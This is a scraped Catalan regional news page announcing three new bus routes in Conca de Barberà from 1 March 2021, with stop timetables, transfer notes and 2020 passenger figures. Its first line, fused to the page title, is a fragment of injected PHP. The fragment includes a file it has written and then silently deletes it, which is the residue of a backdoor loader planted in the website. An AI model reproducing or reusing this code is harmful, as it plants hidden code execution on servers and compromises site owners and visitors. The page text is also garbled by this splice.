");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Tres noves rutes de transport de viatgers a la Conca de Barberà
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Tres noves rutes de transport de viatgers a la Conca de Barberà (25/02/2021)

A partir del proper dilluns, dia 1 de març, els veïns i les veïnes de la Conca de Barberà ja podran fer ús d’alguna de les tres noves rutes de transport de viatgers que enllacen diversos municipis de la comarca i també amb Reus.

La línia Vallverd-Rocafort de Queralt-Montbrió de la Marca-Sarral circularà els dijous al matí d’anada i al migdia de tornada.

Línia: Vallverd - Rocafort de Queralt - Montbrió de la Marca - Sarral
Expedicions : Dijous

Horari de pas:

9.15 h Vallverd 13.00 h Sarral
9.25 h Rocafort de Queralt 13.05 h Montbrió de la Marca
9.30 h Montbrió de la Marca 13.15 h Rocafort de Queralt
9.35 h Sarral 13.20 h Vallverd


La línia de Santa Coloma de Queralt a Montblanc circularà els dimarts i els divendres al matí.

Línia : Sta. Coloma de Queralt a Montblanc

Expedicions: dimarts i divendres

Horari de pas:

Sta. Coloma Queralt 8.10 h
Les Piles 8.15 h
Rocafort de Queralt 8.23 h
Sarral 8.35 h
Pira 8.40 h
la Guàrdia dels Prats 8.45 h
Montblanc 8.57 h


La línia de Montblanc a Reus circularà els dimarts i els divendres al matí d’anada, i a la tarda de tornada.

Línia Montblanc - Reus

Expedicions: dimarts i divendres

Horari de pas:

Montblanc 9.05 h Reus 18.10 h
Vilaverd 9.13 h Vilaverd 18.30 h
Alcover 9.24 h Montblanc, 18.40 h
Reus 9.40 h


En aquest sentit, cal destacar que l’horari establert per a la ruta de Santa Coloma de Queralt a Montblanc, està pensat per poder fer transbord a Montblanc amb la línia Lleida-Tarragona i la línia Montblanc - Reus

Pel que fa al retorn de la línia Reus-Montblanc a les 18.10h també està pensat per fer transbord amb la línia Tarragona-Lleida, i la línia Tarragona-Igualada que arriben a Montblanc diàriament a les 18.40 h

Pel que fa la línia Montblanc-Reus pel matí s'ha establert parada a Alcover, ja que els habitants de Vilaverd tenen com a CAP de referència el d’Alcover.


Cal recordar que el Consell Comarcal de la Conca de Barberà i el Departament de Política Territorial de la Generalitat de Catalunya coŀlaboren des de l’any 1993 per a millorar la xarxa de transport públic de viatgers per carretera de la Conca de Barberà, per permetre la integració d’aquesta a aquells municipis que no gaudeixen de cap servei de transport públic de viatgers per carretera i també per millorar les comunicacions existents donant solucions específiques a les necessitats de desplaçament de la població.

Així, actualment, es dona servei als municipis de la comarcal amb un total de 12 línies, comptant les noves. D’aquestes, les rutes de Biure-Conesa-les Piles-Guialmons Sta. Coloma de Queralt i la Vilanova de Prades-Vallclara-l'Espluga de Francolí -Vimbodí són mixtes de viatgers i escolar.

En total, 3.239 persones van utilitzar el servei de transport de viatgers de la Conca de Barberà el 2020, i va ser la línia 1, la que fa el trajecte: Vilanova de Prades – Vallclara - Vimbodí - l’Espluga de Francolí – Montblanc, la que va registrar més passatgers, un total de 716.

Pots consultar totes les rutes: www.concadebarbera.cat/sites/cccb/files/recursos/TRANSPORT_VIATGERS/horaris_2021_page-0001.jpg

Font: Consell Comarcal de la Conca de Barberà

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona